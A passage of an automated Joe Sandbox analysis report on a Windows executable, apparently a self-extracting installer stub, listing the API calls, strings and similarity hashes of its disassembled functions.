                                          • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                          • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                          • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                          • GetParent.USER32(?), ref: 00406B43
                                          • GetClientRect.USER32(00000000,?), ref: 00406B55
                                          • ClientToScreen.USER32(?,?), ref: 00406B68
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                          • GetClientRect.USER32(?,?), ref: 00406C55
                                          • ClientToScreen.USER32(?,?), ref: 00406B71
                                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                          • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                          • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                            • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                            • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                          • String ID:
                                          • API String ID: 747815384-0
                                          • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                          • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                          • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                          • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                          Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                          • LoadIconW.USER32(00000000), ref: 00407D33
                                          • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                          • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                          • LoadImageW.USER32(00000000), ref: 00407D54
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                          • GetWindow.USER32(?,00000005), ref: 00407E76
                                          • GetWindow.USER32(?,00000005), ref: 00407E92
                                          • GetWindow.USER32(?,00000005), ref: 00407EAA
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                          • LoadIconW.USER32(00000000), ref: 00407F0D
                                          • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                          • SendMessageW.USER32(00000000), ref: 00407F2F
                                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                          • String ID:
                                          • API String ID: 1889686859-0
                                          • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                          • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                          • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                          • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                          Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00406F45
                                          • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                          • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                          • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                          • GetWindowDC.USER32(?), ref: 00406FAA
                                          • GetWindowRect.USER32(?,?), ref: 00406FB7
                                          • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                          • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                          • String ID:
                                          • API String ID: 2586545124-0
                                          • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                          • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                          • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                          • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                          Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                          • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                          • GetDlgItem.USER32(?,?), ref: 004067CC
                                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                          • GetDlgItem.USER32(?,?), ref: 004067DD
                                          • SetFocus.USER32(00000000,?,000004B4,76230E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$Focus
                                          • String ID:
                                          • API String ID: 3946207451-0
                                          • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                          • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                          • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                          • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                          Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: IA$IA$IA$IA$IA$IA
                                          • API String ID: 613200358-3743982587
                                          • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                          • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                          • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                          • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                          Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                          • API String ID: 613200358-994561823
                                          • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                          • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                          • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                          • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                          Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                          • GetDC.USER32(00000000), ref: 00406DFB
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                          • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                          • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                          • String ID:
                                          • API String ID: 2693764856-0
                                          • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                          • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                          • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                          • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                          Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 0040696E
                                          • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                          • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                          • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                          • SelectObject.GDI32(?,?), ref: 004069B8
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                          • SelectObject.GDI32(?,?), ref: 004069F9
                                          • ReleaseDC.USER32(?,?), ref: 00406A08
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                          • String ID:
                                          • API String ID: 2466489532-0
                                          • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                          • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                          • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                          • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                          Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                          • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                          • wsprintfW.USER32 ref: 00407BBB
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID: %d%%
                                          • API String ID: 3753976982-1518462796
                                          • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                          • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                          • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                          • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                          Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$CharUpper$lstrlen
                                          • String ID: hAA
                                          • API String ID: 2587799592-1362906312
                                          • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                          • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                          • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                          • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                          Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                            • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                            • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                            • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                            • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                          • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                          • API String ID: 4038993085-2279431206
                                          • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                          • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                          • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                          • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                          Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EndDialog.USER32(?,00000000), ref: 00407579
                                          • KillTimer.USER32(?,00000001), ref: 0040758A
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                          • SuspendThread.KERNEL32(0000029C), ref: 004075CD
                                          • ResumeThread.KERNEL32(0000029C), ref: 004075EA
                                          • EndDialog.USER32(?,00000000), ref: 0040760C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                          • String ID:
                                          • API String ID: 4151135813-0
                                          • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                          • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                          • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                          • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                          Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                            • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                          • wsprintfA.USER32 ref: 00404EBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$wsprintf
                                          • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                          • API String ID: 2704270482-1550708412
                                          • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                          • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                          • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                          • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                          Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
